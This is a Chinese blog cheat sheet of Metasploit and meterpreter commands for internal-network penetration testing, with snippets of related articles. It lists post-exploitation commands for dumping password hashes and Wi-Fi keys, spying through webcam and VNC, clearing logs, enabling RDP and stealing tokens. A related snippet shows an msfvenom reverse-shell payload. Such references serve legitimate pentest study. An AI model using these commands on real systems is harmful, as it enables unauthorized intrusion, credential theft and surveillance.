内网渗透之msf工具详解

最新推荐文章于 2024-08-02 17:34:02 发布
最新推荐文章于 2024-08-02 17:34:02 发布
阅读量2.2k 收藏 11
点赞数
分类专栏: 内网渗透 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Destiny_one/article/details/107921172
版权

一.文件目录
date目录 存储数据
documentation目录 文档目录
lib目录 存储ruby脚本
modules目录 存储模块和插件
tools目录 存储小工具

二.基础使用
msfdb init 初始化并启动数据库
db_status 查看数据库状态
msfconsole 控制台 (可以使用kage实现界面化)
help 帮助
exit 退出
show 进行罗列模板
search 搜索模块名或cve编号
back 返回上一级
info 查看模块具体信息
show options 查看需要配置的
set 进行设置属性
exploit/run 进行执行
jobs 查看后台执行的工作
kill +id号 停止job

三.收集信息
auxiliary/scanner/discovery/arp_sweep arp扫描
auxiliary/scanner/discovery/udp_sweep udp扫描
auxiliary/scanner/portscan/tcp 端口扫描
还有许多的其他类型的扫描就不再多说了

四.msfvenom
msfvenom -l 查看类型
msfvenom -l payloads 查看所有payload
msfvenom -l archs 查看所有架构
msfvenom -l format 查看所有格式
msfvenom -p 指定payload格式
msfvenom -f 指定输出格式
msfvenom -e 指定编码方式
msfvenom -i 指定编码次数 (注意要小于20)

五.meterpreter
background 返回
sessions -l 查看所有会话信息
sessions -i+id 与指定会话交互
pwd 查看目标当前目录
lpwd 查看本地目录
cd 切换目标的目录
lcd 切换本机的目录
ls 列出目标的文件
lls 列出本机的文件
clearev 清楚痕迹
download 将目标文件下载到本地
upload 将文件上传至目标当前的目录
excute 在目标执行命令的功能(需要参数-H隐藏执行 -f指定进程)
ps 列出目标进程
getuid 查看当前用户用户名
getprivs 查看目标权限
migrate 进行进程迁移
getpid 查看木马进程
shell 进入对方的终端环境(使用 chcp 65001 可以解决乱码)
exit 退出
idletime 查看目标服务器空闲时间
sysinfo 查看目标信息
kill 杀死目标的一个进程
shutdown 关机
reboot 重启
netstat 查看网络连接情况
getsystem 尝试提权
run hashdump 导出目标机密码
run post/windows/wlan/wlan_profile 查看wifi密码
run vnc 实时监控屏幕
run webcam 开启一个摄像头
run post/windows/gather/checkvm 查看目标是否是虚拟机
run post/windows/gather/enum_computers 枚举域内主机
run post/windows/manage/enable_rdp 开启对方的3389端口
load incognito 加载incognito
list_tokens -u 列出可以模拟的令牌
impersonate_token 窃取一个指定的令牌

鸣蜩十四
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF内网渗透实战
hackzkaq的博客
05-17 3892
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
MSF框架渗透工具常见的一些用法
weixin_43836806的博客
07-15 647
1.扫描存活主机 利用的漏洞有 auxiliary/scanner/discovery/arp_sweep 2.探测存活主机的端口 对某网段内的主机的指定端口进行扫描,并查看是否可以利用: 例如:对某一网段的smb445端口进行探测,利用的漏洞为 auxiliary/scanner/smb/smb_version 3.攻击利用:首先查看存活的主机的端口中是否存在弱口令(为主动的攻击做准备) 例如:对应smb445端口开放了,我们就可以试着去看看有没有弱口令 ...
渗透工具MSF系列培训教程(共17课)10-17课
06-20
第1课:什么是Metasploit 第2课:如何安装Metasploit 第3课:如何更新MSF及其结构 第4课:msf用户接口及核心命令 第5课:Exploits模块 第6课:payloads模块 第7课:利用MSF攻击windows 第8课:三个模块作用 第9课:msfcli命令接口 第10课:msfweb命令接口 第11课:msfd命令接口 第12课:msfpayload和msfencode接口 第13课:MSF数据库后台命令 第14课:autopwn命令 第15课:meterpreter plyload 第16课:vncinject payload 第17课:MSF实战应用演示
MSF 内网渗透笔记
07-03 886
MSF 内网渗透笔记   进入meterpreter模式 在meterpreter中输入shell即可进入CMD窗口接着即可执行CMD命令,例如打开RDP服务REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_D...
【Web安全】kali渗透工具MSF以及msfconsole命令详解
最新发布
weixin_51725318的博客
08-02 954
【Web安全】kali渗透工具MSF以及msfconsole命令详解
MSF工具
nigo134的博客
03-24 636
模块介绍 它是一个渗透测试框架(模块介绍)auxiliary:辅助模块,辅助渗透(端口扫描、登陆密码爆破、漏洞验证等)exploits(exp):漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。 命名规则:操作系统/各种应用协议分类payloads:攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码post:后渗透阶段模块,漏洞利用成功获得meteroreter之后,向目标发送的一些功能性指令,如提权等。encoders:编码器模块,主要包含各种编码
渗透测试工具MSF
2303_77223717的博客
07-08 1190
Metasploit Framework 简称MSF,是一款开源的安全漏洞检测工具。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台,集成数千个漏洞利用、辅助测试模块。
渗透测试工具之Metasploit Framework(MSF
weixin_50904074的博客
03-15 1822
Metasploit是当前信息安全与渗透测试领域最流行的术语,它的出现颠覆了以往的已有的渗透测试的方式。几乎所有流行的操作系统都支持Metasploit,而且Metasploit框架在这些流行的系统上的操作基本上都是一样的。Metasploit 框架(Metasploit Framework ,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。
msf内网渗透
10-29
在IT安全领域,尤其是...综上所述,“msf内网渗透”不仅是一种技术手段,更是渗透测试者必须掌握的核心技能之一。通过熟练运用MSF、Ettercap等工具,结合适当的网络攻防策略,可以有效地评估和增强网络系统的安全性。
linux系统安装msf的过程详解
09-14
Linux系统中安装Metasploit Framework(MSF)是一个重要的步骤,对于网络安全研究者和渗透测试人员来说,这是必备的工具。以下是一个详尽的安装教程,特别针对阿里云Linux系统。 首先,确保你的系统已经更新到...
linux内网渗透1
08-03
本文主要涉及的是Linux内网渗透的相关技术与步骤,主要分为以下几个部分: 1. **漏洞利用**: 提到了Wooyun上的一个漏洞(wooyun-2015-0144595),这个漏洞是针对Glassfish应用服务器的。攻击者通过该漏洞可以读取...
内网安全:隧道技术详解
zz12345600354的博客
04-29 1015
Block)协议是一种在计算机网络中共享文件、打印机和其他资源的通信协议。它最初由微软开发,用于在局域网中的计算机之间共享文件和资源,445端口运行打印机共享:SMB协议支持打印机的共享,允许用户在网络中使用共享打印机进行打印操作。通过SMB协议,用户可以连接到其他计算机上的共享打印机,并发送打印任务进行打印。文件共享:SMB协议允许计算机之间共享文件和目录。通过SMB协议,用户可以在网络中访问其他计算机上的共享文件夹,并进行文件的读取、写入和管理操作。
python 内网穿透_内网渗透(十五) | psexec工具使用浅析(admin$)
weixin_39779928的博客
12-10 1154
作者:谢公子CSDN安全博客专家,擅长渗透测试、Web安全攻防、红蓝对抗。其自有公众号:谢公子学安全免责声明:本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表 安世加 的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!欢迎各位添加微信号:qinchang_198231 加入 安世加 交流群 和大佬们一起交...
MSF工具使用方法和工具用途
weixin_44843084的博客
06-19 1550
包含了常见的漏洞利用模块和生成各种木马。 msfconsole -h #显示在msfconsole初始化的选项和参数 http://www.nctry.com/916.html 1.msfconsole #进入msfconsole 框架 2.search ms12-020 #搜索ms12-020漏洞(search ms) 3.use auxiliary/dos/windows/rdp/ms12_020_maxchannelids #使用这个漏洞(
MSF渗透必用工具-就是一个漏洞框架,kali自带
weixin_46248422的博客
06-21 1683
1.kali桌面超时的设置方法 鼠标右击选择应用程序-设置-light桌面管理器-杂项,设置为从不。 2.物理机与虚拟机在同一个网络一般使用桥接模式。 3.渗透攻击:是指
【常用工具MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
热门推荐
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。
渗透测试-MSF工具使用简介及命令使用漏洞利用过程
XLbb的博客
05-08 3212
1.MSF工具使用简介及命令使用(kali系统) 1.1什么是MSF: Metasploit就是一个漏洞框架,是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。 步骤一:在kali系统中运行msf软件 :msfconsole; 如:测试编号为cve-2019-0708 的漏洞(windows7漏洞); 根据漏洞编号,用search查找相应的漏洞攻击工具
内网渗透工具MSF使用教程
CC__Faker的博客
04-01 2666
MSF介绍 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 常见指令 use[exploits/payloads/auxiliary] //指定一个模块并使其开始工作 show[exploits/payloads/auxiliary/options] //显
【常用工具MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)_msf漏洞扫描
2201_75735270的博客
03-29 3555
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
Metasploit入门指南:渗透测试必备工具详解
Metasploit Framework教程是针对MSF(Metasploit Framework)的权威指南,版本为3.2,官方网站为。本教程详尽介绍了如何安装、配置和使用Metasploit进行渗透测试。Metasploit是一个强大的开源工具集,主要用于网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值